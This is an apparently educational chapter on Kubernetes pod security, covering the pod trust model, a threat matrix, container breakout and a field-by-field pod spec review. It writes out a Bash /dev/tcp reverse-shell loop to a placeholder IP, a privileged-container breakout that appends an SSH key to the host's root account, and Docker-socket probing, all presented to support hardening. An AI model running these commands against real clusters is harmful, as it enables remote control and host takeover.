Chapter 2. Pod-level Resources

In this chapter, we’ll start with the atomic unit of Kubernetes deployment: a pod. Pods run apps, and an app may be a single container or many working together in one or more pods.

We consider what bad things can happen in and around a pod, and look at how you can mitigate the risk of getting attacked.

As with any sensible security effort, we’ll begin by defining a lightweight threat model for your system, identifying the threat actors it defends against, and highlighting the most dangerous threats. This gives you a solid basis to devise countermeasures and controls, and take defensive steps to protect your customers’ valuable data.

We’ll go deep into the trust model of a pod and look at what is trusted by default, where we can tighten security with configuration, and what an attacker’s journey looks like.

Anatomy of the attack

Captain Hashjack started their assault on your systems by enumerating BCTL’s DNS subdomains and S3 buckets. These could have offered an easy way into the organisation’s systems, but there was nothing easily exploitable on this occasion. Undeterred, they now create an account on the public website and log in, using a web application scanner like OWASP ZAP (Zed Attack Proxy) to pry into API calls and application code for unexpected responses. They are searching for leaked web-server banner and version information (to learn which exploits might succeed), and are generally injecting and fuzzing APIs for poorly handled user input.
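
To get a feel for this style of probing, you can run a similar baseline scan against your own site; a hedged sketch using ZAP’s published container image (the target URL is hypothetical, and the image and script names reflect ZAP’s packaging at the time of writing):

# passive baseline scan: spiders the target and reports alerts without active attacks
docker run --rm -t owasp/zap2docker-stable zap-baseline.py -t https://shop.bctl.example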

This is not the level of scrutiny that your poorly maintained codebase and systems are likely to withstand for long. Attackers may be searching for a needle in a haystack, but the safest haystack has no needles at all.

Caution

Any computer should be resistant to this type of indiscriminate attack: a Kubernetes system should achieve “minimum viable security” through the capability to protect itself from casual attack with up-to-date software and hardened configuration. Kubernetes encourages regular updates by supporting the last three minor releases (e.g. 1.24, 1.23, and 1.22), which are released every 4 months and ensure a year of patch support. Older versions are unsupported and likely to be vulnerable.

Although many parts of an attack can be automated, this is an involved process. A casual attacker is more likely to scan widely for software paths that trigger published CVEs and run automated tools and scripts against large ranges of IPs (such as the ranges advertised by public cloud providers). These are noisy approaches.

Remote code execution

If a vulnerability in your application can be used to run untrusted (and in this case, external) code, it is called an RCE (remote code execution). An adversary can use an RCE to spawn a remote control session into the application’s environment: here it is the container handling the network request, but if the RCE manages to pass untrusted input deeper into the system, it may exploit a different process, pod, or cluster.

Your first goal for Kubernetes and pod security should be to prevent remote code execution (RCE), which could be as simple as a kubectl exec, or as complex as a reverse shell, such as the one demonstrated in Figure 2-1:

Figure 2-1. Reverse shell into a Kubernetes pod

Application code changes frequently and may hide undiscovered bugs, so robust AppSec practices (including IDE and CI/CD integration of tooling and dedicated security requirements as task acceptance criteria) are essential to keep an attacker from compromising the processes running in a pod.

Note

The Java framework Struts was one of the most widely deployed libraries to suffer a remotely exploitable vulnerability (CVE-2017-5638), which contributed to the breach of Equifax customer data. To fix a supply chain vulnerability like this in a container, the image is quickly rebuilt in CI with a patched library and redeployed, reducing the window during which vulnerable libraries are exposed to the internet. We examine other ways to get remote code execution throughout the book.

With that, let’s move on to the network aspects.

Network attack surface

The greatest attack surface of a Kubernetes cluster is its network interfaces and public-facing pods. Network-facing services such as web servers are the first line of defence in keeping your clusters secure, a topic we will dive into in Chapter 5.

This is because unknown users coming in from across the network scan network-facing applications for the exploitable signs of RCE. They can use automated network scanners to attempt to exploit known vulnerabilities and input-handling errors in network-facing code. If a process or system can be forced to run in an unexpected way, there is the possibility that it can be compromised through these untested logic paths.

To investigate how an attacker may establish a foothold in a remote system using only the humble, all-powerful Bash shell, see for example Chapter 16 of Cybersecurity Ops with bash.

To defend against this, we must scan containers for operating system and application CVEs in the hope of updating them before they are exploited.
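
For example, a scanner such as Trivy (one option among several; the image reference is the demo application used later in this chapter) can be run against an image before it ships:

# scan an image for known operating system and application CVEs
trivy image gcr.io/google-samples/microservices-demo/frontend:v0.2.3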

If Captain Hashjack has an RCE into a pod, it’s a foothold to attack your system more deeply from the pod’s network position. You should strive to limit what an attacker can do from this position, and customise your security configuration to a workload’s sensitivity. If your controls are too loose, this may be the beginning of an organisation-wide breach for your employer, BCTL.

Tip

For an example of spawning a shell via Struts with Metasploit, see Sam Bowne’s guide.

As Captain Hashjack has just discovered, we have also been running a vulnerable version of the Struts library. This offers an opportunity to start attacking the cluster from within.

Warning

A simple Bash reverse shell like this one is a good reason to remove Bash from your containers. It uses Bash’s virtual /dev/tcp/ filesystem, and is not exploitable in sh which doesn’t include this oft-abused feature:

revshell() {
    local DEFAULT_IP="${1:-123.123.123.123}";
    local DEFAULT_PORT="${2:-1234}";
    while :; do
        nohup bash -i &> /dev/tcp/${DEFAULT_IP}/${DEFAULT_PORT} 0>&1;
        sleep 1;
    done
}
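
A quick way to check whether an image ships Bash at all (the image name here is a placeholder for your own):

# if this prints a path, Bash is present and /dev/tcp reverse shells are possible
docker run --rm --entrypoint sh your-image:tag -c 'command -v bash || echo "bash not present"'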

As the attack begins, let’s take a look at where the pirates have landed: inside a Kubernetes pod.

Kubernetes workloads: apps in a pod

Multiple cooperating containers can be logically grouped into a single pod, and every container Kubernetes runs must run inside a pod. Sometimes a pod is called a “workload”, which is one of many copies of the same execution environment. Each pod must run on a Node in your Kubernetes cluster as shown in Figure 2-2.

Cluster deployment example
Figure 2-2. Cluster deployment example (source)

A pod is a single instance of your application. To scale to demand, a workload resource such as a Deployment, DaemonSet, or StatefulSet replicates the application across many identical pods.

Your pods may include sidecar containers supporting monitoring, networking, and security, and “init” containers for pod bootstrap, enabling you to deploy different application styles. These sidecars are likely to have elevated privileges and be of interest to an adversary.

“Init” containers run in order (first to last) to set up a pod and can make security changes to the namespaces, like Istio’s init container configuring the pod’s iptables (in the kernel’s netfilter) so the runtime pods route traffic through a sidecar container. Sidecars run alongside the primary container in the pod, and all non-init containers in a pod start at the same time.
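
As a sketch (the image names and the permission fix are hypothetical), a pod combining an init container and a sidecar looks like this:

apiVersion: v1
kind: Pod
metadata:
  name: app-with-sidecar
spec:
  initContainers:
  - name: init-permissions      # runs to completion before any other container starts
    image: busybox:1.33
    command: ["sh", "-c", "chown -R 1000:1000 /work"]
    volumeMounts:
    - name: work
      mountPath: /work
  containers:
  - name: app                   # primary container
    image: example.com/org/app:v1.0.0
    volumeMounts:
    - name: work
      mountPath: /work
  - name: log-shipper           # sidecar, starts alongside the primary container
    image: example.com/org/log-shipper:v1.0.0
  volumes:
  - name: work
    emptyDir: {}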

Tip

Kubernetes is a distributed system, and ordering of actions (like applying a multi-doc YAML file) is eventually consistent, meaning that API calls don’t always complete in the order that you expect. Ordering depends on various factors and shouldn’t be relied upon: as Tabitha Sable likes to say, Kubernetes is “a friendly robot that uses control theory to make our hopes and dreams manifest… so long as your hopes and dreams can be expressed in YAML”.

What’s inside a pod? Cloud native applications are often microservices, web servers, workers and batch processes. Some pods run one-shot tasks (wrapped with a job, or maybe one single non-restarting container), perhaps running multiple other pods to assist. All these pods present an opportunity to an attacker. Pods get hacked. Or, more often, a network-facing container process gets hacked.

A pod is a trust boundary encompassing all the containers inside, including their identity and access. There is still separation between pods that you can enhance with policy configuration, but you should consider the entire contents of a pod when threat modelling it.

What’s a pod?

A pod is a Kubernetes invention: an environment for multiple containers to run inside. It is the smallest deployable unit you can ask Kubernetes to run. A pod has its own IP address, can mount in storage, and its namespaces surround the containers created by the container runtime (e.g. containerd, CRI-O).

A container is a mini-Linux, its processes containerised with control groups (cgroups) to limit resource usage and namespaces to limit access. A variety of other controls can be applied to restrict a containerised process’s behaviour, as we’ll see in this chapter.

Example pods
Figure 2-3. Example pods (source)

The lifecycle of a pod is controlled by the kubelet, the Kubernetes API server’s deputy, deployed on each node in the cluster to manage and run containers. If the kubelet loses contact with the API server, it continues to manage its workloads, restarting them if necessary. If the kubelet crashes, the container manager also keeps containers running in case they crash. The kubelet and container manager together oversee your workloads.

The kubelet runs pods on worker nodes by instructing the container runtime and configuring network and storage. Each container in a pod is a collection of Linux namespaces, cgroups, capabilities, and Linux Security Modules (LSMs). As the container runtime builds a container, each namespace is created and configured individually before being combined into a container.

Tip

Capabilities are individual switches for “special” root user operations such as changing any file’s permissions, loading modules into the kernel, accessing devices in raw mode (e.g. networks and IO), BPF and performance monitoring, and every other privileged kernel operation.

The root user has all capabilities, and capabilities can be granted to any process or user (“ambient capabilities”). Excess capability grants may lead to container breakout, as we see later in this chapter.
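
You can inspect the capability sets granted to the current process from inside a container; the hex value shown below is a typical default set granted by Docker/runc and will vary with your runtime configuration:

# effective, permitted, and bounding capability sets of PID 1 in the container
grep Cap /proc/1/status

# decode a hex capability mask with capsh (from the libcap package, if installed)
capsh --decode=00000000a80425fb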

In Kubernetes, a newly-created container is added to the pod by the container runtime, where it shares network and interprocess communication namespaces between pod containers.

Figure 2-4 shows a Kubelet running four individual pods on a single node.

Example pods on a node
Figure 2-4. “Example pods on a node” (source)

The container is the first line of defence against an adversary, and container images should be scanned for CVEs before being run. This simple step reduces the risk of running an outdated or malicious container and informs your risk-based deployment decisions: do you ship to production, or is there an exploitable CVE that needs patching first?

Tip
 "Official" container images in public registries have a greater likelihood of being up to date and well-patched, and
Docker Hub signs all official images with Notary as we'll see in <<ch-apps-supply-chain>>.

Public container registries often host malicious images, so detecting them before production is essential. Figure 2-5 shows how this might happen.

Poisoning a public container registry
Figure 2-5. Poisoning a public container registry

Warning

Although starting a malicious container under a correctly configured container runtime is usually safe, there have been attacks against the container bootstrap phase. We examine the /proc/self/exe breakout CVE-2019-5736 later in this chapter.

The Kubelet attaches pods to a container network interface (CNI). CNI network traffic is treated as layer 4 TCP/IP (although the underlying network technology used by the CNI plugin may differ), and encryption is the job of the CNI plugin, the application, a service mesh, or at a minimum, the underlay networking between the nodes. If traffic is unencrypted, it may be sniffed by a compromised pod or node.

Pods can also have storage attached by Kubernetes, using the CSI (Container Storage Interface), which includes the PersistentVolumeClaim and StorageClass seen in Figure 2-6. In Chapter 6 we will get deeper into the storage aspects.

Cluster Example 2
Figure 2-6. Cluster example 2 (source)
Warning

Vulnerabilities have been found in many storage drivers, including CVE-2018-11235, which exposed a Git attack on the gitrepo storage volume, and CVE-2017-1002101, a subpath volume mount mishandling error. We will cover these in Chapter 6.

In Figure 2-6 you can see a view of the control plane and the API server’s central role in the cluster. The API Server is responsible for interacting with the cluster data store (etcd), hosting the cluster’s extensible API surface, and managing the Kubelets. If the API server or etcd instance is compromised, the attacker has complete control of the cluster: these are the most sensitive parts of the system.

For performance in larger clusters, the control plane should run on separate infrastructure to etcd, which requires high disk and network I/O to support reasonable response times for its distributed consensus algorithm, Raft.

As the API server is the etcd cluster’s only client, compromise of either effectively roots the cluster: due to Kubernetes’ asynchronous scheduling, the injection of malicious, unscheduled pods into etcd will trigger their scheduling to a kubelet.

As with all fast-moving software, there have been vulnerabilities in most parts of Kubernetes’ stack. The only solution to running modern software is a healthy continuous integration infrastructure capable of promptly redeploying vulnerable clusters upon a vulnerability announcement.

Understanding containers

Okay, so we have a high-level view of a cluster. But at a low level, what is a “container”? It is a microcosm of Linux that gives a process the illusion of a dedicated kernel, network, and userspace. Software trickery fools the process inside your container into believing it is the only process running on the host machine. This is useful for isolation and migration of your existing workloads into Kubernetes.

Note

As Christian Brauner and Stephane Graber like to say “(Linux) containers are a userspace fiction”, a collection of configurations that present an illusion of isolation to a process inside. Containers emerged from the primordial kernel soup, a child of evolution rather than intelligent design that has been morphed, refined, and coerced into shape so that we now have something usable.

Containers don’t exist as a single API, library, or kernel feature. They are merely the resultant bundling and isolation that’s left over once the kernel has started a collection of namespaces, configured some cgroups and capabilities, added Linux Security Modules like AppArmor and SELinux, and started our precious little process inside.

A container is a process in a special environment with some combination of namespaces either enabled or shared with the host (or other containers). The process comes from a container image, a TAR file containing the container’s root filesystem, its application(s), and any dependencies. When the image is unpacked into a directory on the host and a special filesystem “pivot root” is created, a “container” is constructed around it, and its ENTRYPOINT is run from the filesystem within the container. This is roughly how a container starts, and each container in a pod must go through this process.
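
You can approximate this by hand with util-linux’s unshare, which shows how thin the abstraction is; a rough sketch (run as root, and omitting the cgroup, LSM, and pivot_root steps a real runtime performs):

# start a shell in new mount, UTS, IPC, network, and PID namespaces,
# with a fresh /proc so `ps` only sees processes in the new PID namespace
sudo unshare --mount --uts --ipc --net --pid --fork --mount-proc /bin/sh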

Container security has two parts: the contents of the container image, and its runtime configuration and security context. An abstract risk rating of a container can be derived from the number of security primitives it enables and uses safely (avoiding host namespaces, limiting resource use with cgroups, dropping unneeded capabilities, tightening security module configuration for the process’s usage pattern, and minimising process and filesystem ownership and contents). Kubesec.io rates a pod configuration’s security on how well it enables these features at runtime.

When the kernel detects a network namespace is empty, it will destroy the namespace, removing any IPs allocated to network adapters in it. For a pod with only a single container to hold the network namespace’s IP allocation, a crashed and restarting container would have a new network namespace created and so have a new IP assigned. This rapid churn of IPs would create unnecessary noise for your operators and security monitoring, and so Kubernetes uses the almighty pause container to hold the pod’s shared network namespace open in the event of a crash-looping tenant container. This container is invisible via the Kubernetes API but visible to the container runtime on the host:

andy@k8s-node-x:~ [0]$ docker ps --format '{{.ID}} {{.Image}} {{.Names}}' | grep sublimino-
92bfb60ce6f1 busybox k8s_alpine_sublimino-frontend-5cc74f44b8-4z86v_default_845db3d9-780d-49e5-bcdf-bc91b2cf9cbe_0
21d86e7b4faf k8s.gcr.io/pause:3.1 k8s_POD_sublimino-frontend-5cc74f44b8-4z86v_default_845db3d9-780d-49e5-bcdf-bc91b2cf9cbe_1
...
adcddc431673 busybox k8s_alpine_sublimino-microservice-755d97b46b-xqrw9_default_1eaeaf4c-3a22-4fc9-a154-036e5381338b_0
1a9dcc794b23 k8s.gcr.io/pause:3.1 k8s_POD_sublimino-microservice-755d97b46b-xqrw9_default_1eaeaf4c-3a22-4fc9-a154-036e5381338b_1
...
fa6ac946cf38 busybox k8s_alpine_sublimino-frontend-5cc74f44b8-hnxz5_default_9ba3a8c2-509d-41e0-8771-f38bec5216eb_0
6dbd4f68c9f2 k8s.gcr.io/pause:3.1 k8s_POD_sublimino-frontend-5cc74f44b8-hnxz5_default_9ba3a8c2-509d-41e0-8771-f38bec5216eb_1

Sharing network and storage

A group of containers in a pod share a network namespace, so all your container’s ports are available on the same network adapter to any container in the pod. This gives an attacker in one container of the pod a chance to attack private sockets available on any network interface, including the loopback adapter 127.0.0.1.
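
For example, from a shell in any container of the pod, a service that another container binds only to loopback is directly reachable (the port and the availability of wget here are assumptions):

# probe a neighbouring container's loopback-only port from inside the shared network namespace
wget -qO- http://127.0.0.1:8080/healthz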

Tip

We examine these concepts in greater detail in Chapters 5 and 6.

Each container runs in a root filesystem from its container image that is not shared between containers. Volumes must be mounted into each container in the pod configuration, but a pod’s volumes may be available to all containers if configured that way, as Figure 2-3 shows.

Here we see Figure 2-7 with some of the paths inside a container workload that an attacker may be interested in (note the user and time namespaces are not currently in use):

Nested Pod Namespaces
Figure 2-7. Namespaces wrapping the containers in a pod (inspiration)
Note

User namespaces are the ultimate kernel security frontier, and are generally not enabled due to historically being likely entry points for kernel attacks: everything in Linux is a file, and user namespace implementation cuts across the whole kernel, making it more difficult to secure than other namespaces.

The special virtual filesystems listed here are all possible paths of breakout if misconfigured and accessible inside the container: /dev may give access to the host’s devices, /proc can leak process information, or /sys supports functionality like launching new containers.
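
You can see how the runtime has (or hasn’t) masked these paths from inside the container; on a correctly configured runtime, sensitive /proc entries are covered by tmpfs or /dev/null bind mounts and /sys is mounted read-only:

# list how /proc and /sys are mounted and masked inside the container
mount | grep -E ' on /(proc|sys)'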

What’s the worst that could happen?

A Chief Information Security Officer (CISO) is responsible for the organisation’s security. Your role as a CISO means you should consider worst case scenarios, to ensure that you have appropriate defences and mitigations in place. Attack trees help to model these negative outcomes, and one of the data sources you can use is the Threat Matrix as shown in Figure 2-8.

Microsoft Kubernetes Threat Matrix
Figure 2-8. Microsoft Kubernetes Threat Matrix

But there are some threats missing, and the community has added some (thanks to Alcide, and Brad Geesaman and Ian Coldwater again), as shown in Figure 2-9:

Extended Kubernetes Threat Matrix
Figure 2-9. Extended Kubernetes Threat Matrix (Grey: Alcide, Red: ControlPlane, sig-honk, and friends)
The matrix’s columns are the attacker’s tactics, each annotated with an informal description:

  • Initial Access (popping a shell, part 1: prep)

  • Execution (popping a shell, part 2: exec)

  • Persistence (keeping the shell)

  • Privilege Escalation (container breakout)

  • Defense Evasion (assuming no IDS)

  • Credential Access (juicy creds)

  • Discovery (enumerate possible pivots)

  • Lateral Movement (pivot)

  • Command & Control (C2 methods)

  • Impact (dangers)

The individual techniques listed under these tactics include:

Using Cloud Credentials - service account keys, impersonation

Exec Into Container (bypass admission control policy)

Backdoor Container (add a reverse shell to local or container registry image)

Privileged container (legitimate escalation to host)

Clear Container Logs (covering tracks after host breakout)

List K8s Secrets

List K8s API Server (nmap, curl)

Access Cloud Resources (workload identity and cloud integrations)

Dynamic Resolution (DNS tunnelling)

Data Destruction (datastores, files, NAS, ransomware…)

Compromised Images In Registry (supply chain unpatched or malicious)

BASH/CMD Inside Container (Implant or trojan, RCE/reverse shell, malware, C2, DNS tunnelling)

Writable Host Path Mount (host mount breakout)

Cluster Admin Role Binding (untested RBAC)

Delete K8s Events (covering tracks after host breakout)

Mount Service Principal (Azure specific)

Access Kubelet API

Container Service Account (API server)

App Protocols (L7 protocols, TLS, …)

Resource Hijacking (cryptojacking, malware c2/distribution, open relays, botnet membership)

Application Vulnerability (supply chain unpatched or malicious)

Start New Container (with malicious payload: persistence, enumeration, observation, escalation)

K8s CronJob (reverse shell on a timer)

Access Cloud Resources (metadata attack via workload identity)

Connect From Proxy Server (to cover source IP, external to cluster)

Applications Credentials In Config Files (key material)

Access K8s Dashboard (UI requires service account credentials)

Cluster Internal Networking (attack neighbouring pods or systems)

Botnet (k3d, or traditional)

Application DoS

KubeConfig File (exfiltrated, or uploaded to the wrong place)

Application Exploit (RCE)

Static Pods (reverse shell, shadow API server to read audit-log-only headers)

Pod hostPath Mount (logs to container breakout)

Pod/Container Name Similarity (visual evasion, cronjob attack)

Access Container Service Account (RBAC lateral jumps)

Network Mapping (nmap, curl)

Access Container Service Account (RBAC lateral jumps)

Node Scheduling DoS

Compromise User Endpoint (2FA and federating auth mitigate)

SSH Server Inside Container (bad practice)

Injected Sidecar Containers (malicious mutating webhook)

Node To Cluster Escalation (stolen credentials, node label rebinding attack)

Dynamic Resolution (DNS) (DNS tunnelling/exfiltration)

Compromise Admission Controllers

Instance Metadata API (workload identity)

Host Writable Volume Mounts

Service Discovery DoS

K8s API Server Vulnerability (needs CVE and unpatched API server)

Container Life Cycle Hooks (postStart and preStop events in pod yaml)

Rewrite Container Life Cycle Hooks (postStart and preStop events in pod yaml)

Control Plane To Cloud Escalation (keys in secrets, cloud or control plane credentials)

Shadow admission control or API server

Compromise K8s Operator (sensitive RBAC)

Access K8s Dashboard

PII or IP exfiltration (cluster or cloud datastores, local accounts)

Compromised host (credentials leak/stuffing, unpatched services, supply chain compromise)

Rewrite Liveness Probes (exec into and reverse shell in container)

Compromise Admission Controller (reconfigure and bypass to allow blocked image with flag)

Access Host File System (host mounts)

Access Tiller Endpoint (Helm v3 negates this)

Container pull rate limit DoS (container registry)

Compromised etcd (missing auth)

Shadow admission control or API server (privileged RBAC, reverse shell)

Compromise K8s Operator (compromise flux and read any secrets)

Access K8s Operator

SOC/SIEM DoS (event/audit/log rate limit)

K3d botnet (secondary cluster running on compromised nodes)

Container breakout (kernel or runtime vulnerability e.g. Dirtycow, /proc/self/exe, eBPF verifier bugs, Netfilter)

We’ll explore these threats in detail as we progress through the book. But the first threat, and the greatest risk to the isolation model of our systems, is an attacker breaking out of the container itself.

Container breakout

A cluster admin’s worst fear is a container breakout, that is, a user or process inside a container that can run code outside of the container’s execution environment.

Strictly speaking, a container breakout should exploit the kernel, attacking the code a container is supposed to be constrained by. In the authors’ opinion, any avoidance of isolation mechanisms breaks the contract the container’s maintainer or operator thought they had with the process(es) inside. This means it should be considered equally threatening to the security of the host system and its data, so we define container breakout to include any evasion of isolation.

Container breakouts may occur in various ways:

  • an “exploit” including against the kernel, network or storage stack, or container runtime

  • a “pivot” such as attacking exposed local, cloud, or network services, or escalating privilege and abusing discovered or inherited credentials

  • or most likely just a misconfiguration that allows an attacker an easier or legitimate path to exploit or pivot

If the running process is owned by an unprivileged user (that is, one with no root capabilities), many breakouts are not possible. In that case the process or user must gain capabilities with a local privilege escalation inside the container before attempting to break out.

Once this is achieved, a breakout may start with a hostile root-owned process running in a poorly-configured container. Access to the root user’s capabilities within a container is the precursor to most escapes: without root (and sometimes CAP_SYS_ADMIN), many breakouts are nullified.

Tip

The securityContext and LSM configurations are vital to constrain unexpected activity from zero day vulnerabilities, or supply chain attacks (library code loaded into the container and exploited automatically at runtime).

You can define the active user, group, and filesystem group (set on mounted volumes to ensure readability, gated by fsGroupChangePolicy) in your workloads’ security contexts, and enforce it with admission control (see Chapter 8), as this example from the docs shows:

apiVersion: v1
kind: Pod
metadata:
  name: security-context-demo
spec:
  securityContext:
    runAsUser: 1000
    runAsGroup: 3000
    fsGroup: 2000
  containers:
  - name: sec-ctx-demo
# ...
    securityContext:
      allowPrivilegeEscalation: false
# ...

In a container breakout scenario, if the user is root inside the container and has mount capabilities (granted by default under CAP_SYS_ADMIN, which root has unless dropped), they can interact with virtual and physical disks mounted into the container. If the container is privileged (which amongst other things disables masking of kernel paths in /dev), it can see and mount the host filesystem.

# inside a privileged container
root@hack-aee24088:~ [0]$ ls -lasp /dev/
root@hack-aee24088:~ [0]$ mount /dev/xvda1 /mnt/

# write into host filesystem's /root/.ssh/ folder
root@hack-aee24088:~ [0]$ cat MY_PUB_KEY >> /mnt/root/.ssh/authorized_keys

We look at nsenter privileged container breakouts which escape more elegantly by entering the host’s namespaces in Chapter 6.

While you can easily prevent this attack by avoiding the root user and privileged mode, and enforcing that with admission control, it’s an indication of just how slim the container security boundary can be if misconfigured.

Warning

An attacker controlling a containerised process may have control of the networking, some or all of the storage, and potentially other containers in the pod. Containers generally assume other containers in the pod are friendly as they share resources, and we can consider the pod as a trust boundary for the processes inside. Init containers are an exception: they complete and shut down before the main containers in the pod start, and as they operate in isolation may have more security sensitivity.

The container and pod isolation model relies on the Linux kernel and container runtime, both of which are generally robust when not misconfigured. Container breakout occurs more often through insecure configuration than kernel exploit, although zero-day kernel vulnerabilities are inevitably devastating to Linux systems without correctly configured LSMs (Linux Security Modules, such as SELinux and AppArmor).

Note

In “Architecting Containerised Applications for Resilience” we explore how the Linux Dirtycow vulnerability could break out of insecurely configured containers. One of the authors live demoed fixing the breakout with AppArmor.

Container escape is rarely plain sailing, and fresh vulnerabilities are often patched shortly after disclosure. Only occasionally does a kernel vulnerability result in an exploitable container breakout, and hardening individually containerised processes with LSMs lets defenders tightly constrain high-risk network-facing processes. An escape may entail one or more of:

  • finding a zero-day in the runtime or kernel

  • exploiting excess privilege and escaping using legitimate commands

  • evading misconfigured kernel security mechanisms

  • introspection of other processes or filesystems for alternate escape routes

  • sniffing network traffic for credentials

  • attacking the underlying orchestrator or cloud environment

Vulnerabilities in the underlying physical hardware often can’t be defended against in a container. For example, Spectre and Meltdown, CPU speculative execution attacks, and rowhammer, TRRespass, and SPOILER (DRAM memory attacks) bypass container isolation mechanisms as they cannot intercept the entire instruction stream that a CPU processes. Hypervisors suffer the same lack of possible protection.

Finding new kernel attacks is hard. Misconfigured security settings, exploiting published CVEs, and social engineering attacks are easier. But it’s important to understand the range of potential threats in order to decide your own risk tolerance.

We’ll go through a step-by-step security feature exploration to see a range of ways in which your systems may be attacked in the Appendix.

For more information on how the Kubernetes project manages CVEs, see Exploring container security: Vulnerability management in open-source Kubernetes.

Pod configuration and threats

We’ve spoken generally about various parts of a pod, so let’s finish off by going into depth on a pod spec to call out any gotchas or potential footguns.

Warning

In order to secure a pod or container, the container runtime should be minimally viably secure, that is: not exposing sockets to unauthenticated connections (e.g. /var/run/docker.sock and tcp://127.0.0.1:2375), as this leads to host takeover.
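
A quick check from a compromised pod for the most common runtime sockets (the paths are the usual defaults and may differ on your nodes):

# any hit here is effectively a host takeover for an attacker in the pod
ls -la /var/run/docker.sock /run/containerd/containerd.sock 2>/dev/null

# if the Docker socket is mounted, the daemon answers API calls directly
curl -s --unix-socket /var/run/docker.sock http://localhost/version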

For the purpose of this example, we are using a frontend pod from the GoogleCloudPlatform/microservices-demo application, and it was deployed with kubectl create -f https://raw.githubusercontent.com/GoogleCloudPlatform/microservices-demo/master/release/kubernetes-manifests.yaml.

We have updated and added some extra configuration where relevant for demonstration purposes.

Pod header

The standard header we know and love, defining the type of entity this YAML defines, and its version:

apiVersion: v1
kind: Pod

Metadata and annotations may contain sensitive information like IPs and security hints (in this case, for Istio), although this is only useful if the attacker has read-only access:

metadata:
  annotations:
    seccomp.security.alpha.kubernetes.io/pod: runtime/default
    cni.projectcalico.org/podIP: 192.168.155.130/32
    cni.projectcalico.org/podIPs: 192.168.155.130/32
    sidecar.istio.io/rewriteAppHTTPProbers: "true"

It also historically holds the seccomp, AppArmor, and SELinux policies:

metadata:
  annotations:
    container.apparmor.security.beta.kubernetes.io/hello: localhost/k8s-apparmor-example-deny-write

We look at how to use these annotations in the runtime policies section.

Note

After many years in purgatorial limbo, seccomp in Kubernetes progressed to General Availability in v1.19.

This changes the syntax from an annotation to a securityContext entry:

securityContext:
  seccompProfile:
    type: Localhost
    localhostProfile: my-seccomp-profile.json

The Kubernetes Security Profiles Operator (SPO) can install seccomp profiles on your nodes (a prerequisite to their use by the container runtime), and record new profiles from workloads in the cluster with oci-seccomp-bpf-hook.

The SPO also supports SELinux via selinuxd, with plenty of details in this blog post.

AppArmor is still in beta but annotations will be replaced with first-class fields like seccomp once it graduates to GA.

Let’s move on to a part of the pod spec that is not writable by the client but contains some important hints.

Reverse uptime

When you dump a pod spec from the API server (using, for example, kubectl get -o yaml), it includes the pod’s start time:

  creationTimestamp: "2021-05-29T11:20:53Z"

Pods running for longer than a week or two are likely to be at higher risk of bugs. Sensitive workloads running for more than 30 days will be safer if they’re rebuilt in CI/CD to account for library or operating system patches.

Scanning the existing container image offline for CVEs in the pipeline can inform rebuilds. The safest approach is to combine both: “repave” (that is, rebuild and redeploy containers) regularly, and rebuild through the CI/CD pipelines whenever a CVE is detected.
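
Pod age is easy to audit from the API server:

# list pods cluster-wide, oldest first, to spot long-running workloads due a repave
kubectl get pods --all-namespaces --sort-by=.metadata.creationTimestamp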

Labels

Labels in Kubernetes are not validated or strongly typed: they are metadata. Labels are targeted by things like services and controllers using selectors for referencing, and are also used for security features such as Network Policy.

  labels:
    app: frontend
    type: redish

Typos in labels mean they do not match the intended selectors, and so can inadvertently introduce security issues such as:

  • exclusions from expected network policy or admission control policy

  • unexpected routing from service target selectors

  • “rogue” pods that are not accurately targeted by operators or observability tooling

Managed fields

Managed fields were introduced in v1.18 to support server-side apply. They duplicate information from elsewhere in the pod spec and are of limited interest to us, as we can read the entire spec from the API server. They look like this:

  managedFields:
  - apiVersion: v1
    fieldsType: FieldsV1
    fieldsV1:
      f:metadata:
        f:annotations:
          .: {}
          f:sidecar.istio.io/rewriteAppHTTPProbers: {}
# ...
      f:spec:
        f:containers:
          k:{"name":"server"}:
# ...
            f:image: {}
            f:imagePullPolicy: {}
            f:livenessProbe:
# ...

Pod namespace and owner

We know the pod’s name and namespace from the API request we made to retrieve it.

If we used --all-namespaces to return all pod configurations, this shows us the namespace:

  name: frontend-6b887d8db5-xhkmw
  namespace: default

From within a pod it’s possible to infer the current namespace from the DNS resolver configuration in /etc/resolv.conf (which is secret-namespace in this example):

$ grep -o "search [^ ]*" /etc/resolv.conf
search secret-namespace.svc.cluster.local

Other less-robust options include the mounted service account (assuming it’s in the same namespace, which it may not be), or the cluster’s DNS resolver (if you can enumerate or scrape it).
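
If a token is mounted, the namespace it was issued for can be read directly (bearing in mind the caveat above):

cat /var/run/secrets/kubernetes.io/serviceaccount/namespace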

Environment variables

Now we’re getting into interesting configuration. We want to see the environment variables in a pod, partially because they may leak secret information (which should have been mounted as a file), and also because they may list which other services are available in the namespace and so suggest other network routes and applications to attack:

Warning

As you can see, passwords set in deployment and pod YAML are visible to the operator that deploys the YAML, to the process at runtime and any other process that can read its environment, and to anybody who can read from the Kubernetes or Kubelet APIs.

Here we see the container’s PORT (which is good practice and required by applications running in Knative and some other systems), the DNS names and ports of its coordinating services, some badly-set database config and credentials, and finally a sensibly-referenced secret file.

spec:
  containers:
  - env:
    - name: PORT
      value: "8080"
    - name: CURRENCY_SERVICE_ADDR
      value: currencyservice:7000
    - name: SHIPPING_SERVICE_ADDR
      value: shippingservice:50051
# These environment variables should be set in secrets
    - name: DATABASE_ADDR
      value: postgres:5432
    - name: DATABASE_USER
      value: secret_user_name
    - name: DATABASE_PASSWORD
      value: the_secret_password
    - name: DATABASE_NAME
      value: users
# This is a safer way to reference secrets and configuration
    - name: MY_SECRET_FILE
      value: /mnt/secrets/foo.toml
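
Mounting secrets as files (as MY_SECRET_FILE does) is the safer pattern, but where an environment variable is unavoidable, referencing a Kubernetes secret at least keeps the value out of the pod YAML (the secret name and key here are hypothetical); note it is still visible in the process’s environment at runtime:

    - name: DATABASE_PASSWORD
      valueFrom:
        secretKeyRef:
          name: database-credentials
          key: password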

That wasn’t too bad, right? Let’s move on to container images.

Container images

The container image’s filesystem is of paramount importance to an attacker, as it may hold vulnerabilities that assist in privilege escalation. If you’re not patching regularly, Captain Hashjack might pull the same image from a public registry and scan it for vulnerabilities they may be able to exploit. Knowing what binaries and files are available also enables attack planning “offline”, so adversaries can be more stealthy and targeted when attacking the live system.

Tip

The OCI registry specification allows arbitrary image layer storage: pushing an image is a two-step process, where the blobs (layers) are uploaded first and the manifest referencing them second. An attacker who performs only the first step gains free arbitrary blob storage.

Most registries don’t index these blobs automatically (Harbor being the exception), and so they will store the “orphaned” layers forever, potentially hidden from view until manually garbage collected.

Here we see an image referenced by label, which means we can’t tell what the actual SHA256 hash digest of the container image is. The container tag could have been updated since this deployment as it’s not referenced by digest.

